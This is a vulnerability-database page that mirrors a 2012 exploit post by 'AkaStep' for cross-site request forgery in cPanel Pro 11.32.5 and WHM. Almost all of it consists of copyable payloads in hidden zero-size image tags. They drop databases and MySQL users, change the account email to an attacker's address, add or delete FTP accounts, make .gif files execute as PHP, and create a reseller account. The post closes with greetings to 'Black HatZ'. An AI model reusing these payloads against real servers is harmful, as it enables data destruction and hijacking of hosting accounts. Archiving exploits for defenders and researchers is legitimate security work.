Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cPanel Pro 11.32.5.11 Cross Site Request Forgery

🗓️ 22 Oct 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

cPanel Pro 11.32.5.11 Cross Site Request Forgery allows attackers to: drop database, drop mysql user, change email, add/delete FTP account, change Apache handler, delete handler, and add Reseller+setup with domain

Code
`==============================================================================  
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]   
Vulnerability: CSRF  
Vendor: cpanel.net  
==============================================================================  
  
=====================================================================  
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]   
  
Aka: Cpanel Accelerated 2   
via   
WHM 11.32.5 (build 11)  
  
=====================================================================  
  
CSRF: Drop Database: (Method $_GET)  
  
<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />  
  
Here we are going to drop database named: armenian_music  
=====================================================================  
  
CSRF: Drop mysql user: (Method $_GET)  
  
  
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />  
Here we are going to drop mysql user named: armenian_adserver ))  
  
=====================================================================  
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)  
Changing email address to: [email protected]  
  
<img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" heigth="0" width="0" />  
  
  
=====================================================================  
  
CSRF adding FTP account:  
  
username: akastep  
password: akastep  
host is target host.  
  
  
<img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" heigth="0" width="0" />  
  
=====================================================================  
  
  
CSRF Drop FTP account:  
  
Deletes existent ftp account named: axaxa  
  
  
<img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" />  
  
=====================================================================  
  
  
  
CSRF change Apache handler:  
  
(Parse .gif file as php script)  
  
<img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />  
=====================================================================  
  
  
CSRF Delete handler:  
  
  
<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />  
  
  
=====================================================================  
  
WHM 11.32.5 (build 11)  
  
  
CSRF: Add Reseller+setup  
with domain: owned.com  
username: owned111  
password: MYVERYSTRONGGOESHERE  
And contact email: [email protected]  
  
<img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default&quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" />  
  
  
=====================================================================  
  
  
  
  
  
================================================  
  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
osvdb.com  
websecurity.com.ua  
  
to all Aa Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3 *  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Oct 2012 00:00Current
1Low risk
Vulners AI Score1
cpanel procross site request forgeryvulnerabilitycsrfcpanel.netwhmdrop databasedrop mysql userchange email addressftp accountapache handleradd reseller+setup
32